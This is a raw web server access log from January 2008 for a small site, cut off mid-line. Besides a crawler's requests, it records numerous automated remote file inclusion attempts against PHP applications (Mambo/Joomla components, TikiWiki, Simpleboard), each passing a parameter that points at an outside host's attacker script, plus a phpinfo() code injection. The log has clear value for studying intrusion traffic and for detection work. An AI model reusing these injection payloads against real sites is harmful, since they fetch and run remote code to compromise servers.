202.176.218.45 - - [14/Jan/2008:12:55:07 -0800] "GET /logs/access_070820.log HTTP/1.1" 200 196608 "http://www.galf.org/logs/" "FAST Enterprise Crawler 6 used by Singapore Press Holdings (crawler@sphsearch.sg)" "www.galf.org"
195.62.12.248 - - [14/Jan/2008:12:55:09 -0800] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://carnet.sakura.ne.jp/cscart_dir/skins/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
200.87.230.170 - - [14/Jan/2008:12:55:09 -0800] "GET /logs/access_071126.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://barza.us/images/id1.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
200.87.230.170 - - [14/Jan/2008:12:55:12 -0800] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://barza.us/images/id1.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
200.87.230.170 - - [14/Jan/2008:12:55:16 -0800] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://barza.us/images/id1.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
202.176.218.45 - - [14/Jan/2008:12:55:37 -0800] "GET /logs/access_070826.log HTTP/1.1" 200 196608 "http://www.galf.org/logs/" "FAST Enterprise Crawler 6 used by Singapore Press Holdings (crawler@sphsearch.sg)" "www.galf.org"
202.176.218.45 - - [14/Jan/2008:12:56:08 -0800] "GET /logs/access_070827.log HTTP/1.1" 200 196608 "http://www.galf.org/logs/" "FAST Enterprise Crawler 6 used by Singapore Press Holdings (crawler@sphsearch.sg)" "www.galf.org"
58.103.130.64 - - [14/Jan/2008:12:56:28 -0800] "GET /logs/access_071217.log/default.php?page=http://asterweb.com.br/cav/s.txt??????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
58.103.130.64 - - [14/Jan/2008:12:56:29 -0800] "GET /default.php?page=http://asterweb.com.br/cav/s.txt??????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.9.155.30 - - [14/Jan/2008:12:56:29 -0800] "GET /logs/access_071224.log/index.php?pagina=http://www.nashvillepaintball.com/forums/cache/cmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
58.103.130.64 - - [14/Jan/2008:12:56:29 -0800] "GET /logs/default.php?page=http://asterweb.com.br/cav/s.txt??????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
216.177.128.128 - - [14/Jan/2008:12:56:33 -0800] "GET /logs/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://theseoguide.com/administrator/templates/mambo_admin/css/boo.do?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.galf.org"
72.32.58.11 - - [14/Jan/2008:12:56:34 -0800] "GET /index.php?tikiwiki/tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.phpinfo()&t=png&title=%20TikiWikihttp://www.thepurge.net/dkp//includes/.%20%20%20%20%20%20/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.galf.org"
72.32.58.11 - - [14/Jan/2008:12:56:34 -0800] "GET /logs/index.php?tikiwiki/tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.phpinfo()&t=png&title=%20TikiWikihttp://www.thepurge.net/dkp//includes/.%20%20%20%20%20%20/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.galf.org"
216.177.128.128 - - [14/Jan/2008:12:56:36 -0800] "GET /components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://theseoguide.com/administrator/templates/mambo_admin/css/boo.do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.galf.org"
202.176.218.45 - - [14/Jan/2008:12:56:38 -0800] "GET /logs/access_070903.log HTTP/1.1" 200 196608 "http://www.galf.org/logs/" "FAST Enterprise Crawler 6 used by Singapore Press Holdings (crawler@sphsearch.sg)" "www.galf.org"
213.189.27.130 - - [14/Jan/2008:12:56:46 -0800] "GET /logs/access_071001.log/com_simpleboard/file_upload.php?sbp=http://www.ebci.ucr.ac.cr/administrator/images/.on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
58.103.130.64 - - [14/Jan/2008:12:57:00 -0800] "GET /logs/access_071210.log/default.php?page=http://asterweb.com.br/cav/s.txt??????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
202.176.218.45 - - [14/Jan/2008:12:57:09 -0800] "GET /logs/access_070910.log HTTP/1.1" 200 196608 "http://www.galf.org/logs/" "FAST Enterprise Crawler 6 used by Singapore Press Holdings (crawler@sphsearch.sg)" "www.galf.org"
202.176.218.45 - - [14/Jan/2008:12:57:39 -0800] "GET /logs/access_070917.log HTTP/1.1" 200 196608 "http://www.ga